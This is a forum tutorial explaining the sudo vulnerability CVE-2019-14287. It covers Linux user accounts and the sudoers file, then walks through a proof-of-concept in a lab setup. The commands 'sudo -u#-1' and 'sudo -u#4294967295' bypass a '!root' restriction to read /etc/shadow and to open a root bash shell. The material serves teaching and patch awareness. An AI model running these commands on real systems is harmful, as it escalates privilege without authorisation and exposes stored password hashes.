SUDO Security Bypass Vulnerability – CVE-2019-14287

HackerSploit · November 15, 2019, 4:05am

Vulnerability Details:

Release date: 14th October 2019
CVE ID: CVE-2019-14287
Affected Versions: Versions prior to <= 1.8.28
https://www.sudo.ws/alerts/minus_1_uid.html

Brief description of vulnerability

The security policy bypass vulnerability that allows users on a Linux system to execute commands as root, while the user permissions in the sudoers file explicitly prevents these commands from being run as root.

It can be executed by a user that has ALL permissions in the Runas specification. Which means they can execute commands as any or all users on the system.

This consequently allows users to run commands and tools as root by specifying the user id ( UID ) as -1 or the unsigned equivalent of -1: 4294967295

sudo -u#-1 /usr/bin/id or the unsigned equivalent of -1 sudo -u#4294967295 /usr/bin/id

Explanation of exploit

What is sudo?

sudo is a command that allows you to run scripts or programs that require administrative privileges. It stands for super user do.

You can also use the su (switch user) command to switch the superuser.

How to check sudo version installed?

sudo –version or sudo –version | grep version

How user information is stored in Linux

Each user account has a username, unique identifier (UID), group(GID), home directory, and the default shell to be used when the user logs in to the system.

All user account related information is stored in the passwd file, located in /etc/passwd

Passwords in the passwd file are encrypted and are therefore represented by an x.

The encrypted passwords for accounts are stored in the shadow file, located in /etc/shadow . The shadow file can only be accessed by the root user.

Structure of user account

username:password:UID:GID:comments:home_directory:shell

The first user in the passwd file is the root account

The root account always has a UID of 0

System accounts have a UID of less than 1000 while user accounts have UID >= 1000

The sudoers file

The sudoers file contains all the permissions for users and groups on a Linux system. it is found in /etc/sudoers

The sudoers file can be accessed and modified securely by using visudo.

visudo is a tool that allows you to access and make changes to the sudoers file securely, it does this by ensuring that only one user is editing the sudoers file and by checking for logical errors.

We will use visudo to demonstrate the exploit.

POC

This will depend on user permissions in regards to commands specified within the sudoers file.

Requirements:

The user requires sudo privileges that allow running of commands with user ID’s – We will be setting this up in the sudoers file
sudo version <= 1.8.28

Create user on system.
Modify the sudoers file with visudo.
Provide the user with sudo privileges and specify the commands that can be run.

alexis ALL=(ALL, !root) /usr/bin/vi

You can also specify a command alias.

Cmnd_Alias VIM = /usr/bin/vi

After setting up permissions, log in as user alexis and run command:

sudo -u#-1 vi /etc/shadow

To confirm this try running it without specifying the UID.

sudo vi /etc/shadow

This confirms that the UID -1 bypasses the permissions and allows for command execution.

You can also confirm this by using the id command.

If a user can run any command then we can get a bash shell as root user

alexis ALL=(ALL, !root) ALL

sudo -u#-1 bash